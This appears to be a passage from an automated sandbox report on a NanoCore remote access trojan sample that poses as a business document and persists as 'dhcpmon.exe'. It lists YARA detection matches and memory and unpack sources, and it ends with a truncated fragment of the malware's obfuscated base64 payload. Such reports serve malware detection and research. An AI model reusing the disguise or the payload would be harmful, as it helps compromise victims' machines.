Source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 5980, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: dhcpmon.exe PID: 6052, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: dhcpmon.exe PID: 6052, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b0a6a5.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.dhcpmon.exe.3db4575.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4af064e.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.dhcpmon.exe.3daff4c.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.dhcpmon.exe.2dc9658.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.dhcpmon.exe.3daff4c.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b0a6a5.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b04c79.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4af064e.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

.NET source code contains very large strings

Show sources

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, LogIn.cs	Long String: Length: 13656
Source: sjZXfoyePbSa.exe.0.dr, LogIn.cs	Long String: Length: 13656
Source: 0.0.COMPANY PROFILE AND DOCUMENTED OFFER.exe.a70000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.a70000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: dhcpmon.exe.7.dr, LogIn.cs	Long String: Length: 13656
Source: 7.0.COMPANY PROFILE AND DOCUMENTED OFFER.exe.9a0000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 8.2.dhcpmon.exe.b50000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 8.0.dhcpmon.exe.b50000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 14.2.dhcpmon.exe.960000.1.unpack, LogIn.cs	Long String: Length: 13656

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: COMPANY PROFILE AND DOCUMENTED OFFER.exe

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_0137C2B0	0_2_0137C2B0
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_01379990	0_2_01379990
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090B0040	0_2_090B0040
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090B9628	0_2_090B9628
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090B3048	0_2_090B3048
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090B3058	0_2_090B3058
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090B3298	0_2_090B3298
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090B32A8	0_2_090B32A8
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090B0D80	0_2_090B0D80
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090BCE80	0_2_090BCE80
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_02E6C2B0	8_2_02E6C2B0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_02E69990	8_2_02E69990
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_06070040	8_2_06070040
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071FEFC0	8_2_071FEFC0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071F9628	8_2_071F9628
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071F0040	8_2_071F0040
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071F32A8	8_2_071F32A8
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071FC570	8_2_071FC570
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071F0D80	8_2_071F0D80
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071F3058	8_2_071F3058
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071F3048	8_2_071F3048
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 14_2_013BE471	14_2_013BE471
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 14_2_013BE480	14_2_013BE480
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 14_2_013BBBD4	14_2_013BBBD4

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 5980, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: dhcpmon.exe PID: 6052, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: dhcpmon.exe PID: 6052, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b0a6a5.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b0a6a5.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.dhcpmon.exe.3db4575.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.dhcpmon.exe.3db4575.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4af064e.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4af064e.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.dhcpmon.exe.3daff4c.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.dhcpmon.exe.3daff4c.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.dhcpmon.exe.2dc9658.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.dhcpmon.exe.2dc9658.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.dhcpmon.exe.3daff4c.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.dhcpmon.exe.3daff4c.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b0a6a5.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b04c79.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4af064e.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: sjZXfoyePbSa.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: dhcpmon.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 14.2.dhcpmon.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 14.2.dhcpmon.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.dhcpmon.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, LogIn.cs	Base64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NN